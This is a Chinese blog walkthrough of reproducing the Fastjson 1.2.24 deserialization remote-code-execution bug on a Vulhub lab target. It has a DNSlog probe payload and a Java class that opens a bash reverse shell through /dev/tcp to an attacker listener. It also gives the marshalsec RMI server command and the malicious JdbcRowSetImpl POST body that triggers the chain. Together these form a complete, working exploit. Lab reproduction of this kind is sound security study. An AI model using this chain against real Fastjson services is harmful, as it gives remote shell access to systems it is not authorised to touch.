【Vulhub】Fastjson 1.2.24_rce复现

文章目录

一,Fastjson是什么?

Fastjson 是阿里巴巴开发的一款将 json 字符串和 java 对象进行序列化和反序列化的开源 json 解析库。

二,fastjson漏洞原理

fastjson 提供了 autotype 功能,在请求过程中,我们可以在请求包中通过修改@type 的值,来反序列化为指定的类型,而 fastjson 在反序列化过程中会设置和获取类中的属性,如果类中存在恶意方法,就会导致代码执行等这类问题

三,判断是否有fastjson反序列化

正常请求是 get 请求并且没有请求体,可以通过构造错误的 POST 请求,即可查看在返回包中是否有 fastjson 这个字符串来判断

四,复现Fastjson 1.2.24_rce(vulhub)

环境配置

fastjson环境配置详细

这里我使用vulhub中的fastjson靶机做复现

1.判断是否存在Fastjson反序列化

抓包,构造恶意POST请求,先弄一个dnslog,看是否可以接收到请求

php 复制代码
payload:

{"lzh":{"@type":"javera.net.Inet4Address","val":"dnslog"}}

发送POST请求包

看到可以请求成功,说明存在fastjson漏洞

2.反弹shell

写一个反弹shell的java文件

java 复制代码
package java_exp;

import java.lang.Runtime;
import java.lang.Process;
public class Touchfile {

    static {
        try {
            Runtime rt = Runtime.getRuntime();
            String[] commands = {"/bin/bash","-c","bash -i >& /dev/tcp/监听IP地址/8989 0>&1"};
            Process pc = rt.exec(commands);
            pc.waitFor();
        } catch (Exception e){

        }
    }
}

编译Java文件

复制代码
javac Touchfile.java

将编译好的class文件,通过xftp移动到vps服务器中,并在当前目录开一个python服务,开启8080端口

3.启动RMI服务器

RMI(远程方法调用)使用 RMI 技术可以使一个 JVM 中的对象,调用另一个 JVM 中的对象方法并获取调用结果。这里的另一个 JVM 可以在同一台计算机也可以是远程计算机。因此,RMI 意味着需要一个 Server 端和一个 Client 端

下载marshalsec ,这是一款 Java 反序列化利用工具 , 配置好之后,目录下会出现target目录,进入调用jar文件

下载教程:marshalsec下载

复制代码
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://IP:8989/#TouchFile" 6666

ip地址就是你攻击机的IP地址,8989端口是接收Touchfile.class文件,而6666端口是调用RMI服务器的接口

开启监听端口:就是在java文件中写的端口8989端口是监听端口

4.构造恶意POST请求

shell 复制代码
POST请求

{
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://IP地址:6666/Touchfile",
        "autoCommit":true
    }
}

发送数据包,没有回显说明反弹成功

相关推荐
xdscode11 小时前
Spring 依赖注入方式全景解析
java·后端·spring
爱吃烤鸡翅的酸菜鱼11 小时前
Java 事件发布-订阅机制全解析:从原生实现到主流中间件
java·中间件·wpf·事件·发布订阅
无限码力11 小时前
华为OD技术面真题 - JAVA开发- spring框架 - 7
java·开发语言·华为od·华为od面试真题·华为odjava八股文·华为odjava开发题目·华为odjava开发高频题目
Lyyaoo.11 小时前
【JAVA基础面经】JAVA中的异常
java·开发语言
一定要AK11 小时前
JVM 全体系深度解析笔记
java·jvm·笔记
coder阿龙11 小时前
基于SpringAI+Qdrant+Ollama本地模型和向量数据库开发问答和RAG检索
java·数据库·spring boot·ai·数据库开发
Gofarlic_OMS11 小时前
HyperWorks用户仿真行为分析与许可证资源分点配置
java·大数据·运维·服务器·人工智能
徒 花11 小时前
Python知识学习08
java·python·算法
Lyyaoo.12 小时前
【JAVA基础面经】== 和 equals() 的区别
java·开发语言·jvm
lifallen12 小时前
Flink Agent:RunnerContext 注入与装配演进分析
java·大数据·人工智能·语言模型·flink